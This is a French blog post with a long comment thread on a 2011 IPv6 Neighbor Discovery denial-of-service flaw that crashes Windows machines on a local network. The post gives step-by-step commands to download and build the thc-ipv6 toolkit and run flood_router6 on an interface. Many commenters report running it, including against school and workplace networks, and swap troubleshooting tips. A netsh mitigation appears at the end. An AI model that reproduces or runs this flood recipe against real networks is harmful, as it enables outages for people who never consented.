La faille DOS IPv6 Neighbor Discovery pour Windows


Shutdown
Une nouvelle faille de sécurité vient d'être découverte dans le protocole Neighbor Discovery d'IPv6. Elle permet de faire planter, à distance, toutes les machines Windows (version XP, Vista, Seven, Server 2003 et 2008) d'un réseau. Certains équipements Cisco et 3DM sont également impactés.

BSOD Windows Vista

L'exploitation de cette faille est plutôt simple, surtout si l'on se sert de l'utilitaire flood_router6 présent dans le logiciel Thc-ipv6.

Voici un exemple d'utilisation sous Ubuntu :

sudo apt-get install libpcap0.8-dev libssl-dev
wget http://freeworld.thc.org/releases/thc-ipv6-1.8.tar.gz
tar zxvf thc-ipv6-*.tar.gz && rm -f thc-ipv6-*.tar.gz
cd thc-ipv6-*
make
sudo ./flood_router6 eth0

Chez moi, tous les Windows 7 ont planté. Mais pire encore, l'iPhone de ma copine semble également avoir été touché (plantage du téléphone alors qu'elle jouait à un jeu...).

Les machines Linux ont parfaitement résisté pour une fois. Pour les systèmes Windows, la seule parade à cette attaque est de mettre à jour votre machine ou de désactiver IPv6.

La commande MS-DOS suivante doit le permettre (non testée) :

netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled


42 Commentaires pour "La faille DOS IPv6 Neighbor Discovery pour Windows"

Flux des commentaires de cet article Ajouter un commentaire
  •  

    Ah, l'IPv6, ça va mettre un joyeux bordel ça !

    RépondreRépondre
    JackDaniels93 , le 27 mars 2011 à 10:25
  •  

    Je viens de tester, ca a aussi fait planter l'iphone. Pas de problème avec Android par contre.

    Par contre faut m'expliquer où trouver MS-DOS sur Windows XP et plus. Je sais même pas s'il y a encore un émultateur DOS sur Seven. Il y a bien une interface en ligne de commande, mais c'est absolument pas DOS derrière ;)

    RépondreRépondre
    Eric , le 27 mars 2011 à 10:58
  •  

    @Eric : DOSBox peut-être ?
    http://www.dosbox.com/

    RépondreRépondre
    JackDaniels93 , le 27 mars 2011 à 11:05
  •  

    DOS = denial of service ^^

    RépondreRépondre
    Saullasky , le 27 mars 2011 à 12:03
  •  

    arf, sa ne fonctionne pas chez moi, j'ai le droit a un messages d'erreur :

    ben@ben-System /media/home/ben/thc-ipv6-1.4 $ sudo ./flood_router6 eth0
    Starting to flood network with router advertisements on eth0 (Press Control-C to end, a dot is printed for every 100 packet):
    .....................Error sending packet no. 2135 on interface eth0: No buffer space available

    et c'est le même message sous linux mint et ubuntu :/

    ça vient peut-être des CPL ?

    RépondreRépondre
    benoit2600 , le 27 mars 2011 à 12:55
  •  

    @benoit2600 : J'ai le même message chez moi. Cependant, le PC de ma soeur sous Windows a bel et bien planté :).

    RépondreRépondre
    Dimitri , le 27 mars 2011 à 13:37
  •  

    @Eric : ce n'est pas du MS-DOS effectivement, mais la commande doit fonctionner quand même avec l'émulateur de terminal sous WIndows XP. Chez moi il reconnait bien le programme netsh.

    @benoit2600 @Dimitri : que vous donne la commande "dmesg | grep eth" à ce moment là ? Avez-vous regardez du coté de /var/log/messages également, si il n'y a pas un autre message d'erreur ?

    RépondreRépondre
    pti-seb , le 27 mars 2011 à 14:51
  •  

    J'ai le même message sur Ubuntu.

    Dans /var/log/messages :

    Mar 27 16:53:14 ubuntu-desktop kernel: [17602.493221] flood_router6 uses obsolete (PF_INET,SOCK_PACKET)

    RépondreRépondre
    Giraya , le 27 mars 2011 à 15:52
  •  

    Sympa cet outil, mais en jetant un coup d'œil rapide à le site, je n'ai pas trouvé d'explication théorique. C'est bien beau de lancer un script qui va planter les Windows d'un réseau, mais j'aimerais bien avoir un peu plus d'infos sur le pourquoi du comment. Un piste peut-être?

    RépondreRépondre
    Silhm , le 27 mars 2011 à 18:22
  •  
    Gu1 , le 27 mars 2011 à 19:21
  •  

    Les amis, cmd c'est interpréteur de commande rien à voir avec dos ou un émulateur. Netsh bien sur ça marche même sur 7, mais "Local Area Connection" ce n'est pas forcément le nom de la bonne interface réseau. Pour la faille c'est probablement un paquet mal formé.

    RépondreRépondre
    kern , le 27 mars 2011 à 19:42
  •  

    @Silhm : la faille porte la référence CVE-2010-4669, tu trouveras d'autres informations sur ce site par exemple.

    @Giraya @benoit2600 : pour ceux qui ont un message d'erreur, vous utilisez quelle version d'Ubuntu ? On dirait un problème d'utilisation de méthodes réseaux obsolètes.

    RépondreRépondre
    pti-seb , le 27 mars 2011 à 23:00
  •  

    testé ce matin, et effectivement ça a freezé les pc dans mon BTS IG :D

    RépondreRépondre
    Antoine Turmel (GeekShadow) , le 28 mars 2011 à 08:39
  •  

    @kern : pas un paquet mal formé, mais une feature de ipv6, ou les routeurs s'annoncent eux-meme sur le réseau. Dans ce cas la, les paquets sont spoofés avec plein d'ips différentes.

    La suite d'outils ipv6 a été présentée au CCC de décembre passé:
    https://events.ccc.de/congress/2010/Fahrplan/events/3957.en.html

    RépondreRépondre
    rorist , le 28 mars 2011 à 09:05
  •  

    Est-ce que ça peu également faire planter un contrôleur de domaine sous Win Server 2008 ?? Et est-ce qu'il peut rester des séquelles de l'éxécution d'une telle commande sur un réseau?

    Je dis ça car sur notre réseau, quelqu'un s'est amusé à le faire ce matin et je voudrais savoir si je dois m'attendre à d'autres surprises ??

    Bien sûr, la mise à jour des postes est en cours pour éviter que ça se reproduise . . .

    RépondreRépondre
    Florian Bezagu , le 28 mars 2011 à 10:54
  •  

    PS commentaire précédent :
    @ptit-seb, je crois que ton serveur ne s'est pas encore remis du changement d'heure, les commentaires sont à l'heure d'hiver . . . ;-)

    RépondreRépondre
    Florian Bezagu , le 28 mars 2011 à 10:59
  •  

    @Florian Bezagu : Windows 2008 serveur est également touché par la faille. Sinon quand on arrête la commande, le réseau retourne dans son état normal.

    Je ne suis pas sûr que Microsoft propose un correctif. Donc le mieux est la désactivation d'IPv6 jusqu’à ce qu'il confirme la sortie d'un patch.

    Et pour les horaires d'été, je me fait avoir à chaque fois. C'est corrigé maintenant au niveau du site.

    RépondreRépondre
    pti-seb , le 28 mars 2011 à 12:37
  •  

    Question bête ptet mais ça fonctionnerait via wifi ?

    RépondreRépondre
    djiock , le 28 mars 2011 à 13:23
  •  

    Je n'active jamais l'IPV6 sur mes serveurs et sur mes masters clients.
    MACOSX concerné ?

    RépondreRépondre
    bartounet , le 28 mars 2011 à 14:15
  •  

    euh question bête, ça ne fonctionne pas si le réseau est en ipv4, si ?

    RépondreRépondre
    gorgor , le 28 mars 2011 à 14:46
  •  

    Si les equipements fonctionnent en ipv6 si. Pour ca c'est une plaie cette transition à moitié faite.. Certain firewall laisse par exemple passer l'ipv6 par défaut..

    RépondreRépondre
    Doczak , le 28 mars 2011 à 14:50
  •  

    @pti-seb : Meme probleme flood_router6 uses obsolete (PF_INET,SOCK_PACKET) j'utilise la version 64 bits de kubuntu 10.10 si quelqu'un peut m'éclairer !?

    RépondreRépondre
    Zaken , le 28 mars 2011 à 15:12
  •  

    @Zaken : quel kernel ? system à jour ?

    RépondreRépondre
    Doczak , le 28 mars 2011 à 15:14
  •  

    @Doczak : 2.6.35-28-generic

    RépondreRépondre
    Zaken , le 28 mars 2011 à 15:27
  •  

    Finalement j'ai ma reponse j'ai vu sur le site offciel (Note: it is for Linux 2.6, IA32 only!) donc n'est pas supporté sur les architecture 64 bits

    RépondreRépondre
    Zaken , le 28 mars 2011 à 15:36
  •  

    @Zaken : ben je suis en 64bits et ca fonctionne.. Linux xxx 2.6.35-22-generic #35-Ubuntu SMP Sat Oct 16 20:45:36 UTC 2010 x86_64 GNU/Linux

    RépondreRépondre
    Doczak , le 28 mars 2011 à 15:39
  •  

    En fait il y a quand même un petit souci (bien moins gênant ) sous Linux. flood_router6 génère un très grand nombre de passerelles ipv6, du coup quand on va sur google, qui lui sait causer en ipv6, notre client essai d'abord les passerelles ipv6 avant d'utiliser la gateway ipv4. Ce qui donne un temps de réponse de la part de google vraiment mauvais :p
    Mais outre les pb rencontrés sur les systèmes MS, c'est un peu le fonctionnement propre d'ipv6 qui est touché du doigt. En effet cela montre bien que sur un lien local, n'importe quel équipement peu s'annoncer router et filer une gateway, ce qui est pour le moins dérangeant. Une des seules solutions que je vois c'est que le switch filtre ces annonces pour ne laisser que celles qui sont légitimes...

    RépondreRépondre
    Boula-Bytes , le 28 mars 2011 à 15:40
  •  

    Bon ben je vois pas d'ou le probleme pourrait provenir

    RépondreRépondre
    Zaken , le 28 mars 2011 à 15:47
  •  

    Finalement probleme resolu erreur bete de ma part j'ai oublié le sudo

    RépondreRépondre
    Zaken , le 28 mars 2011 à 17:21
  •  

    sudo ./flood_router6 wlan0
    Starting to flood network with router advertisements on wlan0 (Press Control-C to end, a dot is printed for every 100 packet):
    ..Error sending packet no. 281 on interface wlan0: No buffer space available

    J'ai cette erreur, quelqu’un peut m'aider ?

    RépondreRépondre
    Steph , le 28 mars 2011 à 19:02
  •  

    @djiock : oui cela peut fonctionner via le wifi.

    @bartounet : pour Mac OS, je pense qu'il soit concerné, en tous les cas personne n'en parle.

    @Steph : plein de gens on cette erreur mystérieuse. Il n'y a pas de solution pour l'instant.

    RépondreRépondre
    pti-seb , le 28 mars 2011 à 20:48
  •  

    @bartounet @pti-seb : Mac OS X 10.6.7 est bien concerné je viens te tester.

    RépondreRépondre
    1CEB0X , le 29 mars 2011 à 00:08
  •  

    @pti-seb : la mienne a disparu du jour au lendemain...

    RépondreRépondre
    Dimitri , le 29 mars 2011 à 07:45
  •  

    @1CEB0X : J'ai essayé sur mon iMac Sl 10.6.6 et la faille ne fonctionne pas

    RépondreRépondre
    Anonyme , le 29 mars 2011 à 16:23
  •  

    La faille fonctionne mais ne plante pas le mac, mise à par le réseau forcement.

    http://img841.imageshack.us/i/capturedcran20110329213.png/

    RépondreRépondre
    1CEB0X , le 29 mars 2011 à 21:36
  •  

    Bizarrement je n'ai pas réussi à faire fonctionner le script. Pourtant je n'ai jamais désactiver l'IPv6.
    Je l'ai lancé depuis un EEEPC sous Ubuntu 10.10 sur mon réseau domestique, avec une neufbox.
    Si quelqu'un voit d'où ça pourrai venir...

    RépondreRépondre
    Destroy , le 30 mars 2011 à 17:44
  •  

    @Destroy : C'est possible que vos cartes réseau ne supporte tout simplement pas la charge du script.. c'est assez bourrin quand meme.

    RépondreRépondre
    Doczak , le 30 mars 2011 à 17:45
  •  

    Pour être plus précis le script se lance, je l'ai bien lancé en sudo, mais aucun effet sur deux PCs différents branchés sur le même réseau. Donc je n'ai aucune erreur c'est juste que rien ne se passe.

    RépondreRépondre
    Destroy , le 30 mars 2011 à 17:52
  •  

    quote "flood_router6 uses obsolete (PF_INET,SOCK_PACKET) "
    même erreur sur un kubuntu 32bits mais ça marche quand même

    testé sur un win7 64bits, pas d'écran bleu
    donc au début je pensais que ça marchait pas
    mais en fait ça a bien planté le système, plus moyen d'ouvrir un taskmanager !

    RépondreRépondre
    linxtek , le 30 mars 2011 à 22:19
  •  

    même problem: flood_router6 uses obsolete (PF_INET,SOCK_PACKET)
    rien ne se passe sur le reseau.
    j'utilise un backtrack4 et un wifi awus036h.

    RépondreRépondre
    dje , le 1 avril 2011 à 12:00
  •  

    J'aime !! longue vie a Tux-planet :D

    RépondreRépondre
    Youness Kosei inoue , le 4 avril 2011 à 15:29
  •  

    Waouh comme même c'est bourin pas tres discret en plus :)

    RépondreRépondre
    KBtarantino , le 1 juillet 2011 à 19:58
 

Ajouter un commentaire

actualité android apache apple astuce astuces bash bilboblog blog boot chrome clavier commande commandes conky date debian Desktop développement elementary exploit faille fedora firefox flash gimp gnome google graphique Graphisme hack hacking Hardware humour intel internet iphone jailbreak Jeux Kde kernel libre Linux log logiciels Logiciels Libres lucid lynx maemo mail maquette metasploit microsoft mobile mockup monitoring mozilla multi-touch musique mysql n900 nautilus nokia noyau openoffice open source password photos php Planet publicité red hat redhat rpm réseau screenshot script serveur serveurs shell sql ssh statistiques sysadmin system Sécurité thème tux-planet tv twitter ubuntu unity vidéo vidéos vlc voyage wallpaper windows wordpress yum